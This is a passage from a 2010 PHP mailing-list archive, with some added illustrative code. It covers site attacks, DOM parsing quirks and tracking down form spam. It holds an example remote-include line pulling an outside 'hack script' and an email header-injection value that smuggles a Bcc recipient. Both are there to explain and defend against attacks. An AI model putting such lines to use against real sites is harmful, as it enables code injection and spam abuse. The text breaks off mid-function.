Why waste time validating an integer value when intval() will do  
that for you?



Thanks,
Ash
http://www.ashleysheridan.co.uk





Re: [PHP] Security Issue

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:

 PHP Injection is the technical name given to a security hole in PHP
 applications. When this gap there is a hacker can do with an external
 code that is interpreted as an inner code as if the code included was
 more a part of the script.
 
 
 
 // my code...
 // my code...
 include ('http:///externalhackscript.txt');
 //my code...
 //my code..
 
 
 I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT. 
 
 
 Got it?
 
 
 
 
 
 Regards,
 Igor Escobar 
 Systems Analyst  Interface Designer
 
 + http://blog.igorescobar.com
 + http://www.igorescobar.com
 + @igorescobar (twitter)
 
 
 
 
 
 
 On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan
 a...@ashleysheridan.co.uk wrote:
 
 
 On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
 
  It's not a SQL Injection or XSS problem, Michael.
 
  It's a PHP Injection problem. I know how fix that but the
 web site is very
  very huge, have lots and lots of partners and i'm have a bug
 difficult do
  identify the focus of the problem.
 
  Got it?
 
 
  Regards,
  Igor Escobar
  Systems Analyst  Interface Designer
 
  + http://blog.igorescobar.com
  + http://www.igorescobar.com
  + @igorescobar (twitter)
 
 
 
 
 
  On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle
 mike...@gmail.com wrote:
 
   It's not that bad.
  
   Use filter functions and sanity checks for input.
  
   Use htmlspecialchars() basically on output.
  
   That should take care of basically everything.
  
  
   On Jun 7, 2010, at 6:16 AM, Igor Escobar
 titiolin...@gmail.com wrote:
  
This was my fear.
  
   Regards,
   Igor Escobar
   Systems Analyst  Interface Designer
  
   + http://blog.igorescobar.com
   + http://www.igorescobar.com
   + @igorescobar (twitter)
  
  
  
  
  
   On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind
 peter.e.l...@gmail.com
   wrote:
  
On 7 June 2010 14:54, Igor Escobar
 titiolin...@gmail.com wrote:
  
   Hi Folks!
  
   The portal for which I work is suffering constant
 attacks that I feel
  
   that
  
   is PHP Injection. Somehow the hacker is getting to
 change the cache
   files
   that our system generates. Concatenating the HTML file
 with another that
   have an iframe to a malicious JAR file. Do you have any
 suggestions to
   prevent this action? The hacker has no access to our
 file system, he is
   imputing the code through some security hole. The
 problem is that the
  
   portal
  
   is very big and has lots and lots partners hosted on
 our estructure
   structure. We are failing to identify the focus of this
 attacks.
  
   Any ideas?
  
  
   Check all user input + upload: make sure that whatever
 comes from the
   user is validated. Then check all output: make sure that
 everything
   output is escaped properly. Yes, it's an enormous task,
 but there's no
   way around it.
  
   Regards
   Peter
  
   --
   hype
   WWW: http://plphp.dk / http://plind.dk
   LinkedIn: http://www.linkedin.com/in/plind
   BeWelcome/Couchsurfing: Fake51
   Twitter: http://twitter.com/kafe15
   /hype
  
  
   --
   PHP General Mailing List (http://www.php.net/)
   To unsubscribe, visit: http://www.php.net/unsub.php
  
  
 
 
 
 
 What do you mean it's a PHP injection? PHP is all on the
 server, and the
 only way to get at that if you don't have direct access to the
 server
 (which you've said isn't possible as the passwords, etc are
 all fine)
 then the bad data is coming from either a form or another area
 where
 user data is expected. This data might be as simple as
 unsanitised URL
 variables that are intended to fetch a blog entry, to form
 data sent in
 a registration page.
 
 All data coming from the user is bad until proven otherwise.
 
 
 
 Thanks,
 Ash
 http://www.ashleysheridan.co.uk
 
 
 
 
 


That data is still coming from somewhere, so is still badly sanitised

RE: [PHP] Security Issue

2010-06-07 Thread Bob McConnell
From: Ashley Sheridan

 On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
 
 PHP Injection is the technical name given to a security hole in PHP
 applications. When this gap there is a hacker can do with an external
 code that is interpreted as an inner code as if the code included was
 more a part of the script.
 
 That data is still coming from somewhere, so is still badly sanitised
 data either coming from a form or a URL. You really should go over all
 the code to find these and root them out, which is a mammoth task. To
 narrow it down, those access logs I mentioned before will help. I
think
 there are ways you can automatically detect security holes in your
 software, but if none of your user data is sanitised correctly, then
 virtually everything is a potential security hole.

You need to narrow your search down a bit.

Are there corrupted files on the server?

Who has write privileges for those files and directories?

Are they tracked via a content management system?

Who last wrote to them?

Can you further restrict who is allowed to write into those files and
directories?

Bob McConnell




Re: [PHP] DOMDocument::loadXML() failed when parsing comments inside a script tag

2010-06-07 Thread Raymond Irving
Hi Adam,

Thanks for the update but I'm thinking that it would be much easier if the
DOM parser could just ignore the contents of the script tags when parsing
HTML content. This way we would not have to out JavaScript or force users to
add JavaScript to a separate file.

What do you think?

__
Raymond Irving

On Sun, Jun 6, 2010 at 11:22 PM, Adam Richardson simples...@gmail.com wrote:

 On Sun, Jun 6, 2010 at 10:39 PM, Raymond Irving xwis...@gmail.com wrote:

 Hello,

 I'm experiencing another issue when attempting to use
 DOMDocument::loadXML()
 to load the following HTML code:

 <?php
 $html = '
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html>
 <body>
 <script type="text/javascript">
 <!--
 var i = 0, html = "<strong>Bold Text</strong>,Normal Text";
 document.write(html);
 i--; // this line causes the parser to fail
 alert(html);
 -->
 </script>
 </body>
 </html>';
 $dom = new DOMDocument();
 $dom->loadXML($html);
 echo $dom->saveHTML();
 ?>

 The parser throws the following error when it encounters i-- in inside
 the
 script tag:

 Warning: DOMDocument::loadXML() [domdocument.loadxml]: Comment not
 terminated !-- var i = 0, html = strongBold Text in Entity

 If I remove the line i-- it will load the HTML code just fine.

 Any ideas as to why this throws an error?

 __
 Raymond



 A comment declaration starts with <!, and ends with >, with any number
 of comments following the form --comment-- in between:
 http://htmlhelp.com/reference/wilbur/misc/comment.html

 You'll see at the bottom of the article that they advocate a simple rule in
 comments:
 An HTML comment begins with "<!--", ends with "-->" and does not contain
 "--" or ">" anywhere in the comment.

 The occurrence of i-- breaks that rule.

 In your case, if you're maintaining the pages, you can place the javascript
 in a separate file or place the javascript in a CDATA section.  If you're
 parsing pages you don't maintain, you can rip out the javascript before
 performing DOM tasks and parse it separately as needed to avoid potential
 issues.

 Adam

 --
 Nephtali:  PHP web framework that functions beautifully
 http://nephtaliproject.com
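
Added example (not code from the thread): the two wrappings discussed above, parsed with DOMDocument::loadXML() while libxml's errors are collected instead of being emitted as warnings. The script body with i-- sits once inside an XML comment and once inside a CDATA section; the helper name xml_errors() and the shortened sample documents are assumptions made for the illustration.

```php
<?php
// Added illustration, not code from the thread.

/** Parse $markup as XML and return the parser's messages (empty = well-formed). */
function xml_errors($markup)
{
    $previous = libxml_use_internal_errors(true);   // collect, do not emit warnings
    $dom = new DOMDocument();
    $dom->loadXML($markup);
    $messages = [];
    foreach (libxml_get_errors() as $error) {
        $messages[] = sprintf('line %d: %s', $error->line, trim($error->message));
    }
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $messages;
}

// Constructed script body containing the "--" that XML comments forbid.
$script = 'var i = 0, html = "<strong>Bold Text</strong>,Normal Text";' . "\n"
        . 'i--;' . "\n";

$documents = [
    'script wrapped in a comment' =>
        "<html><body><script type=\"text/javascript\">\n<!--\n{$script}-->\n"
        . "</script></body></html>",
    'script wrapped in CDATA' =>
        "<html><body><script type=\"text/javascript\">\n//<![CDATA[\n{$script}//]]>\n"
        . "</script></body></html>",
];

foreach ($documents as $label => $markup) {
    $errors = xml_errors($markup);
    echo $label, ': ', $errors ? 'not well-formed' : 'well-formed', "\n";
    foreach ($errors as $message) {
        echo '    ', $message, "\n";
    }
}
```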



Re: [PHP] DOMDocument throws Unexpected end tag error when loading valid HTML

2010-06-07 Thread Raymond Irving
Hi Richard,

<![CDATA[

<html><tag><soup>here</soup></tag></html>

]]>


I believe putting <![CDATA[ ]]> around the HTML will not work when using
<!DOCTYPE html> and it will also prevent the html from being parsed into
nodes that can be accessed via the DOM APIs

Or should the html that is inside the JS be urlencoded?


&lt;strong&gt;

This works but the only drawback is that we would have to decode it when we
want to generate HTML inside the browser

Many thanks for the feedback

Best regards,
__
Raymond Irving

On Mon, Jun 7, 2010 at 4:45 AM, Richard Quadling rquadl...@gmail.com wrote:

 On 6 June 2010 19:56, Raymond Irving xwis...@gmail.com wrote:
  Hello,
 
  Sorry to have to be writing to you directly. I've tried sending this
 email
  to the mailing list but it keeps returning with a failure message:
 
  Remote host said: 550 5.7.1 reject mailfrom [sbl]
 
  It appears that my yahoo about has been black listed?
 
  Anyway, I'm hoping you can help me with the following issue:
 
  I'm getting a php warning from DOMDocument after running a test script
 that
  tried to load some html inside the DOM and then echo the html to the
  browser:
 
  Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end
 tag
  : strong in Entity, line: 8 in C:\www\dom-test.php on line 23
 
  The problem is that DOMDocument::loadHTML() attempts to remove the
  '</strong>'  tag from within a JavaScript string variable inside the
  <script> tag. If I try to wrap <!-- --> around the content of the
 script
  tag it will still throw the error.
 
 
  I've tested it with php *5.2.0, 5.2.6, 5.2.11*, *5.3* and *5.3.2*. It
  appears to work just fine in version 5.2.0 but the other version throw
 the
  above error.
 
  Here's the script. Can anyone confirm this error or is there a known
  workaround?
 
  <?php
 
  $html = '
  <!DOCTYPE html>
  <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html;
 charset=UTF-8"/>
 <script type="text/javascript">
 var html = "<strong>Bold Text</strong>,Normal Text";
 document.write(html);
 alert(html);
 </script>
 </head>
 <body> </body>
  </html>
  ';
 
  $dom = new DOMDocument();
  $dom->loadHTML($html);
 
  echo $dom->saveHTML();
 
  ?>
 
 
  Best regards
  __
  Raymond Irving
 

 Or should the html that is inside the JS be urlencoded?

 &lt;strong&gt;

 ?

 --
 -
 Richard Quadling
 Standing on the shoulders of some very clever giants!
 EE : http://www.experts-exchange.com/M_248814.html
 EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp
 Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731
 ZOPA : http://uk.zopa.com/member/RQuadling



Re: [PHP] Re: DOMDocument throws Unexpected end tag error when loading valid HTML

2010-06-07 Thread Raymond Irving
Thanks Nisse. This works great!

I just wish the HTML DOM parser could just ignore the contents of the
script tags. It would have made life so much easier for developers working
with the DOM.

Best regards,

__
Raymond Irving

2010/6/7 Nisse Engström news.nospam.0ixbt...@luden.se


 In HTML, the "</" sequence closes the <script> element.
 You can escape the "/" character with a backslash:

"<strong>Bold Text<\/strong>,Normal Text"




[PHP] empty() and method return values

2010-06-07 Thread Tanel Tammik
Hi,

empty() cannot check the return value of the method or function. Which would 
be the best workaround?

empty($class->method())   // gets an error

I could do

$method_return_value = $class->method() and then run empty() on 
$method_return_value, or is there a better option? I would like to do it in 
an if statement.

I wrote a class for handling file uploads and there is a method 
getErrors() which returns an empty array in case of 0 errors and I need to 
check it before I move any files. I'm just curious, what is the right way to 
do that!

Br
Tanel 






Re: [PHP] DOMDocument::loadXML() failed when parsing comments inside a script tag

2010-06-07 Thread Andrew Ballard
On Mon, Jun 7, 2010 at 3:30 PM, Raymond Irving xwis...@gmail.com wrote:
 Hi Adam,

 Thanks for the update but I'm thinking that it would be much easier if the
 DOM parser could just ignore the contents of the script tags when parsing
 HTML content. This way we would not have to out JavaScript or force users to
 add JavaScript to a separate file.

 What do you think?

 __
 Raymond Irving

You didn't tell it to open the contents as HTML; you told it to open
the contents as XML.

Andrew




Re: [PHP] empty() and method return values

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote:

 Hi,
 
 empty() cannot check the return value of the method or function. which would 
 be the best workaround?
 
 empty($class->method())   // gets an error
 
 i could do
 
 $method_return_value = $class->method() and then run empty() on 
 $method_return_value or is there an better option? i would like to do it in 
 if statement
 
 i wrote an class for handling file uploads and there is an method 
 getErrors() which returns empty array in case of 0 errors and i need to 
 check it before i move any files. i'm just curious, what is the right way to 
 do that!
 
 Br
 Tanel 
 
 
 


Are you sure this is what is giving you the error, as people are using
this fine in their examples on the manual page for empty()

Thanks,
Ash
http://www.ashleysheridan.co.uk




[PHP] Re: Test [don't read]

2010-06-07 Thread Ahmed Mohsen

On 6/7/2010 9:15 PM, João Cândido de Souza Neto wrote:

I couldn´t resist.


teddtedd.sperl...@gmail.com  escreveu na mensagem
news:p0624080cc832e662f...@[192.168.1.102]...


--
---
http://sperling.com  http://ancientstones.com  http://earthstones.com




me too ;)




Re: [PHP] regular expression

2010-06-07 Thread Tanel Tammik

Peter Lind peter.e.l...@gmail.com wrote in message 
news:aanlktilqkz8dnc0zacfv70tctf2wqkgpzojccqtuw...@mail.gmail.com...
 On 1 June 2010 17:33, Ashley Sheridan a...@ashleysheridan.co.uk wrote:
 On Tue, 2010-06-01 at 16:31 +0100, Richard Quadling wrote:

 $re1 = '/^[a-z]++$/i';
 $re2 = '/^[a-z ]++$/i';



 --
 -
 Richard Quadling
 Standing on the shoulders of some very clever giants!
 EE : http://www.experts-exchange.com/M_248814.html
 EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp
 Zend Certified Engineer : 
 http://zend.com/zce.php?c=ZEND002498r=213474731
 ZOPA : http://uk.zopa.com/member/RQuadling



 Why the double ++ in the expressions there? Surely one + would match the
 1 or more characters that you need and the second one would just be
 surplus?


 Equally important: why have three people already done this persons
 homework. 5 minutes googling would have answered this ...


 -- 
 hype
 WWW: http://plphp.dk / http://plind.dk
 LinkedIn: http://www.linkedin.com/in/plind
 BeWelcome/Couchsurfing: Fake51
 Twitter: http://twitter.com/kafe15
 /hype

i made an regular expression now by myself. i need to check if string starts 
with 'get' and is followed only by letters a-z case insensitive. am i 
correct?

'/^get[a-z]++$/i'

Br
Tanel 






Re: [PHP] empty() and method return values

2010-06-07 Thread Tanel Tammik

Ashley Sheridan a...@ashleysheridan.co.uk wrote in message 
news:1275940320.2248.40.ca...@localhost...
 On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote:

 Hi,

 empty() cannot check the return value of the method or function. which 
 would
 be the best workaround?

 empty($class->method())   // gets an error

 i could do

 $method_return_value = $class->method() and then run empty() on
 $method_return_value or is there an better option? i would like to do it 
 in
 if statement

 i wrote an class for handling file uploads and there is an method
 getErrors() which returns empty array in case of 0 errors and i need to
 check it before i move any files. i'm just curious, what is the right way 
 to
 do that!

 Br
 Tanel





 Are you sure this is what is giving you the error, as people are using
 this fine in their examples on the manual page for empty()

 Thanks,
 Ash
 http://www.ashleysheridan.co.uk




from the php manual:

Note: empty() only checks variables as anything else will result in a parse 
error. In other words, the following will not work: empty(trim($name)).

Br
Tanel 






Re: [PHP] empty() and method return values

2010-06-07 Thread Peter Lind
On 7 June 2010 21:52, Ashley Sheridan a...@ashleysheridan.co.uk wrote:
 On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote:

 Hi,

 empty() cannot check the return value of the method or function. which would
 be the best workaround?

 empty($class->method())   // gets an error

 i could do

 $method_return_value = $class->method() and then run empty() on
 $method_return_value or is there an better option? i would like to do it in
 if statement

 i wrote an class for handling file uploads and there is an method
 getErrors() which returns empty array in case of 0 errors and i need to
 check it before i move any files. i'm just curious, what is the right way to
 do that!

 Br
 Tanel





 Are you sure this is what is giving you the error, as people are using
 this fine in their examples on the manual page for empty()


Empty only works on variables, not return values from functions.

If you're checking the return value from a function, just do if
($class->method()). The return value will be cast to bool - look here
for the conversions:
http://dk2.php.net/manual/en/language.types.boolean.php

Regards
Peter

-- 
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype




Re: [PHP] empty() and method return values

2010-06-07 Thread Tanel Tammik

Peter Lind peter.e.l...@gmail.com wrote in message 
news:aanlktinmvaqv-hdgjlq_dwoquvojbbmbfrixnxvqk...@mail.gmail.com...
On 7 June 2010 21:52, Ashley Sheridan a...@ashleysheridan.co.uk wrote:
 On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote:

 Hi,

 empty() cannot check the return value of the method or function. which 
 would
 be the best workaround?

 empty($class->method()) // gets an error

 i could do

 $method_return_value = $class->method() and then run empty() on
 $method_return_value or is there an better option? i would like to do it 
 in
 if statement

 i wrote an class for handling file uploads and there is an method
 getErrors() which returns empty array in case of 0 errors and i need to
 check it before i move any files. i'm just curious, what is the right way 
 to
 do that!

 Br
 Tanel





 Are you sure this is what is giving you the error, as people are using
 this fine in their examples on the manual page for empty()


Empty only works on variables, not return values from functions.

If you're checking the return value from a function, just do if
($class->method()). The return value will be cast to bool - look here
for the conversions:
http://dk2.php.net/manual/en/language.types.boolean.php

Regards
Peter

-- 
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype

Thanks! It works...

<?php
class TestClass {
  protected $errors = array();

  function getErrors() {
    return $this->errors;
  }
}

$class = new TestClass;

// An empty array casts to false, so no empty() call is needed.
if ($class->getErrors()) {
  echo 'there is an value!';
} else {
  echo 'empty';
}
?>

No need to complicate things.

Br
Tanel 






[PHP] Battle of Spam

2010-06-07 Thread Brian Dunning
Hey - It looks like a PHP form on my server is insecure and is being used to 
send spam. This is Rackspace's best guess. The problem is there are SO MANY 
forms on all the web sites on this server that it would be a nightmare task to 
try and look at them all to be sure they're properly secured.

Is anyone aware of a way to shortcut this process, maybe find out what 
script(s) are being attacked to send the spam?

:-(





Re: [PHP] Security Issue

2010-06-07 Thread richard gray

On 07/06/2010 20:00, Igor Escobar wrote:

PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.

// my code...
// my code...
include ('http:///externalhackscript.txt');
//my code...
//my code..

can you not switch off remote file includes in php.ini?
This will stop include/require from a remote host..
i.e. allow_url_include = Off in php.ini

HTH
Rich




Re: [PHP] Battle of Spam

2010-06-07 Thread Peter Lind
On 7 June 2010 22:25, Brian Dunning br...@briandunning.com wrote:
 Hey - It looks like a PHP form on my server is insecure and is being used to 
 send spam. This is Rackspace's best guess. The problem is there are SO MANY 
 forms on all the web sites on this server that it would be a nightmare task 
 to try and look at them all to be sure they're properly secured.

 Is anyone aware of a way to shortcut this process, maybe find out what 
 script(s) are being attacked to send the spam?

 :-(


Check your server access logs - if it's sending lots of spam it's
getting hit more than other forms (and you should possibly see other
equally interesting signs, such as referrer). Also ... if you're
letting users specify an email address to send to as well as content
and you don't make sure to authenticate users, you're really asking to
get abused.

Regards
Peter


-- 
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype
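
The access-log check suggested in the message above, as an added example that is not part of the original thread: it counts POST requests per script and notes how many arrived without a referrer. The Apache combined log format and the helper name `rank_post_targets()` are assumptions, and the log lines are constructed.

```php
<?php
// Added example, not code from the thread. Assumes Apache "combined" log
// format; rank_post_targets() is a hypothetical helper name.

/**
 * Count POST requests per script path and rank the busiest targets first.
 *
 * @param iterable $lines access-log lines (array, generator or SplFileObject)
 * @return array path => ['posts' => int, 'ips' => int, 'no_referer' => int]
 */
function rank_post_targets(iterable $lines): array
{
    // host ident user [time] "METHOD target proto" status bytes "referer" ...
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" \d{3} \S+(?: "([^"]*)")?/';
    $stats = [];
    foreach ($lines as $line) {
        if (!preg_match($re, $line, $m) || $m[2] !== 'POST') {
            continue; // unparsable line, or not a form submission
        }
        $path = explode('?', $m[3], 2)[0]; // group by script, ignore query string
        if (!isset($stats[$path])) {
            $stats[$path] = ['posts' => 0, 'ips' => [], 'no_referer' => 0];
        }
        $stats[$path]['posts']++;
        $stats[$path]['ips'][$m[1]] = true; // set of client addresses
        $referer = $m[4] ?? '-';
        if ($referer === '-' || $referer === '') {
            $stats[$path]['no_referer']++; // POST that did not follow a page view
        }
    }
    foreach ($stats as $path => $s) {
        $stats[$path]['ips'] = count($s['ips']); // collapse the set to a count
    }
    uasort($stats, fn($a, $b) => $b['posts'] <=> $a['posts']);
    return $stats;
}

// Constructed sample lines (documentation address ranges, made-up paths).
$sample = [
    '192.0.2.10 - - [07/Jun/2010:13:01:02 -0700] "GET /siteA/contact.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [07/Jun/2010:13:01:40 -0700] "POST /siteA/contact.php HTTP/1.1" 200 512 "http://sitea.example/contact.php" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Jun/2010:13:02:01 -0700] "POST /siteB/tellafriend.php HTTP/1.0" 200 87 "-" "-"',
    '198.51.100.8 - - [07/Jun/2010:13:02:02 -0700] "POST /siteB/tellafriend.php HTTP/1.0" 200 87 "-" "-"',
    '203.0.113.5 - - [07/Jun/2010:13:02:03 -0700] "POST /siteB/tellafriend.php?x=1 HTTP/1.0" 200 87 "-" "-"',
    '203.0.113.5 - - [07/Jun/2010:13:02:04 -0700] "POST /siteB/tellafriend.php HTTP/1.0" 200 87 "-" "-"',
];

foreach (rank_post_targets($sample) as $path => $s) {
    printf("%-26s posts=%d ips=%d no_referer=%d\n",
        $path, $s['posts'], $s['ips'], $s['no_referer']);
}
```

For a real log, pass `new SplFileObject($pathToAccessLog)` instead of the sample array; a script with many POSTs, few preceding GETs and mostly empty referrers is the first one to read.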




Re: [PHP] Battle of Spam

2010-06-07 Thread Jim Lucas
Brian Dunning wrote:
 Hey - It looks like a PHP form on my server is insecure and is being used to 
 send spam. This is Rackspace's best guess. The problem is there are SO MANY 
 forms on all the web sites on this server that it would be a nightmare task 
 to try and look at them all to be sure they're properly secured.
 
 Is anyone aware of a way to shortcut this process, maybe find out what 
 script(s) are being attacked to send the spam?
 
 :-(
 
 

Usually it isn't your php/html form that is insecure, it is the processing
script that processes said form.  Change all the forms to use a single
processing script and then you won't have such a big problem tracking down the
information processing error/insecurity that you are having.

-- 
Jim Lucas

A: Maybe because some people are too annoyed by top-posting.
Q: Why do I not get an answer to my question(s)?
A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?




Re: [PHP] Battle of Spam

2010-06-07 Thread Paul M Foster
On Mon, Jun 07, 2010 at 01:25:28PM -0700, Brian Dunning wrote:

 Hey - It looks like a PHP form on my server is insecure and is being used to 
 send spam. This is Rackspace's best guess. The problem is there are SO MANY 
 forms on all the web sites on this server that it would be a nightmare task 
 to try and look at them all to be sure they're properly secured.
 
 Is anyone aware of a way to shortcut this process, maybe find out what 
 script(s) are being attacked to send the spam?

Assuming that the form is using the mail() function or something similar
to send the spam, add yourself as a recipient of the forms you manage.
Then you will see for sure if *your* forms are being used for spam.

If you find that your forms are being used to spam, implement CAPTCHA to
hinder bots. (Nothing will stop humans manually spamming via your
forms.) Very little short of this will stop bot spam. You could sanitize
form values and reject spam-like forms, but that's complicated and
error-prone. CAPTCHA is simpler.

Paul

-- 
Paul M. Foster




Re: [PHP] Battle of Spam

2010-06-07 Thread Brian Dunning
Agreed that's a great overall strategy but what I need now is a way to track 
down the offending script, within the next few days if possible.

On Jun 7, 2010, at 1:35 PM, Jim Lucas wrote:

 Change all the forms to use a single
 processing script and then you won't have such a big problem tracking down the
 information processing error/insecurity that you are having.






[PHP] complex if statement for field validation

2010-06-07 Thread David Mehler
Hello,
I've got a form with three fields that are not required for proper
completion of it, ending month, day, year fields. If a user enters
nothing no problem, but if those form fields are entered I need them
validated. They have to be in the correct format YYYY-MM-DD date
format and that value also has to be greater than the starting date
validated previously. I've got some not working code.
Thanks.
Dave.

// if an ending date field was entered validate that
// also must be greater than the starting date values
if(!empty($_POST['month1']) && !empty($_POST['day1']) &&
!empty($_POST['year1']) {
$month1=$_POST['month1'];
$day1=$_POST['day1'];
$year1=$_POST['year1'];
$date_value1="$year1-$month1-$day1";
}
if(!checkdate($month1,$day1,$year1)) {
echo "Invalid Date.\n";
} else {
echo "Entered Date is correct.\n";
}
}
if(!checkdate($month1,$day1,$year1))  $date_value {
echo "Invalid Date.\n";
} else {
echo "Entered Date is correct.\n";
}




Re: [PHP] Battle of Spam

2010-06-07 Thread Robert Cummings

Brian Dunning wrote:

Agreed that's a great overall strategy but what I need now is a way to track 
down the offending script, within the next few days if possible.

On Jun 7, 2010, at 1:35 PM, Jim Lucas wrote:


Change all the forms to use a single
processing script and then you won't have such a big problem tracking down the
information processing error/insecurity that you are having.


Create a user space function called mail_filtered() that accepts all the 
parameters that the usual mail function does. Then change all 
occurrences of the mail() function call to mail_filtered() and for each 
email sent, create a log of it and a shallow copy of debug_backtrace() 
so you can see where it originated. I always use some kind of mail lib 
that allows me to debug emails by adding extra information and 
redirecting the address during dev.


Cheers,
Rob.
--
E-Mail Disclaimer: Information contained in this message and any
attached documents is considered confidential and legally protected.
This message is intended solely for the addressee(s). Disclosure,
copying, and distribution are prohibited unless authorized.




Re: [PHP] Battle of Spam

2010-06-07 Thread Brian Dunning
I think I must have misstated the problem. Thanks to everyone for the replies, 
but the question is not how to fix it, it's how to find the script being 
attacked. Many different admins manage many different sites on this server, and 
I can't even begin to guess how many mail forms are on there from different 
programmers.

I'm currently downloading the logs as Peter suggested, and will take a look. 
I'm not much of a sysad and I just thought maybe someone might know a way to 
sniff outgoing email or something, I really don't know how to attack this. 
Fixing the scripts is a long term solution, obviously, but I need a short term 
fix other than killing email on the apache account.

Might be more of a Linux question than a PHP question.





Re: [PHP] regular expression

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 22:54 +0300, Tanel Tammik wrote:

 Peter Lind peter.e.l...@gmail.com wrote in message 
 news:aanlktilqkz8dnc0zacfv70tctf2wqkgpzojccqtuw...@mail.gmail.com...
  On 1 June 2010 17:33, Ashley Sheridan a...@ashleysheridan.co.uk wrote:
  On Tue, 2010-06-01 at 16:31 +0100, Richard Quadling wrote:
 
  $re1 = '/^[a-z]++$/i';
  $re2 = '/^[a-z ]++$/i';
 
 
 
  --
  -
  Richard Quadling
  Standing on the shoulders of some very clever giants!
  EE : http://www.experts-exchange.com/M_248814.html
  EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp
  Zend Certified Engineer : 
  http://zend.com/zce.php?c=ZEND002498r=213474731
  ZOPA : http://uk.zopa.com/member/RQuadling
 
 
 
  Why the double ++ in the expressions there? Surely one + would match the
  1 or more characters that you need and the second one would just be
  surplus?
 
 
  Equally important: why have three people already done this persons
  homework. 5 minutes googling would have answered this ...
 
 
  -- 
  hype
  WWW: http://plphp.dk / http://plind.dk
  LinkedIn: http://www.linkedin.com/in/plind
  BeWelcome/Couchsurfing: Fake51
  Twitter: http://twitter.com/kafe15
  /hype
 
 i made an regular expression now by myself. i need to check if string starts 
 with 'get' and is followed only by letters a-z case insensitive. am i 
 correct?
 
 '/^get[a-z]++$/i'
 
 Br
 Tanel 
 
 
 


Yep, that looks right. If you're in any doubt, there are lots of online
regex testers which you can run strings and patterns against. Just
Google for them.

Thanks,
Ash
http://www.ashleysheridan.co.uk




Re: [PHP] complex if statement for field validation

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 16:51 -0400, David Mehler wrote:

 Hello,
 I've got a form with three fields that are not required for proper
 completion of it, ending month, day, year fields. If a user enters
 nothing no problem, but if those form fields are entered I need them
 validated. They have to be in the correct format YYYY-MM-DD date
 format and that value also has to be greater than the starting date
 validated previously. I've got some not working code.
 Thanks.
 Dave.
 
 // if an ending date field was entered validate that
 // also must be greater than the starting date values
 if(!empty($_POST['month1']) && !empty($_POST['day1']) &&
 !empty($_POST['year1']) {
 $month1=$_POST['month1'];
 $day1=$_POST['day1'];
 $year1=$_POST['year1'];
 $date_value1="$year1-$month1-$day1";
 }
 if(!checkdate($month1,$day1,$year1)) {
 echo "Invalid Date.\n";
 } else {
 echo "Entered Date is correct.\n";
 }
 }
 if(!checkdate($month1,$day1,$year1))  $date_value {
 echo "Invalid Date.\n";
 } else {
 echo "Entered Date is correct.\n";
 }
 


strtotime() can create a timestamp from a date string that you can use
to compare two dates, and the strings can be put together with the
values from the variables. I'm assuming that your form is using a
combination of select lists to create the date, so you should be able to
just grab the integer values to test they are within valid ranges for a
date.

Thanks,
Ash
http://www.ashleysheridan.co.uk




Re: [PHP] Battle of Spam

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 14:34 -0700, Brian Dunning wrote:

 I think I must have misstated the problem. Thanks to everyone for the 
 replies, but the question is not how to fix it, it's how to find the script 
 being attacked. Many different admins manage many different sites on this 
 server, and I can't even begin to guess how many mail forms are on there from 
 different programmers.
 
 I'm currently downloading the logs as Peter suggested, and will take a look. 
 I'm not much of a sysad and I just thought maybe someone might know a way to 
 sniff outgoing email or something, I really don't know how to attack this. 
 Fixing the scripts is a long term solution, obviously, but I need a short 
 term fix other than killing email on the apache account.
 
 Might be more of a Linux question than a PHP question.
 
 


See if you can find all calls to a mail function in PHP. The easiest way
to use a form to send spam is to enter your own headers, for example, in
one of the fields.

For instance, if a form has a to field, just enter a string like this:
t...@test.com\nbcc:s...@spam.com which will then send email to the
spam address as a bcc recipient. 

Thanks,
Ash
http://www.ashleysheridan.co.uk
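
The `mail_filtered()` wrapper suggested earlier in this thread, combined with a check for the newline-in-a-field trick described in the message above, as an added example that is not code from any poster. The log format, the `$send` hook and the log path are assumptions, and the addresses are constructed.

```php
<?php
// Added example, not code from the thread. The log format, the $send hook and
// the log path are assumptions; the addresses are constructed sample values.

/**
 * Stand-in for mail(): records which script and line asked for the message,
 * blocks CR/LF header injection in To and Subject, then hands off to $send.
 */
function mail_filtered(string $to, string $subject, string $message,
                       string $headers = '', ?callable $send = null,
                       ?string $logFile = null): bool
{
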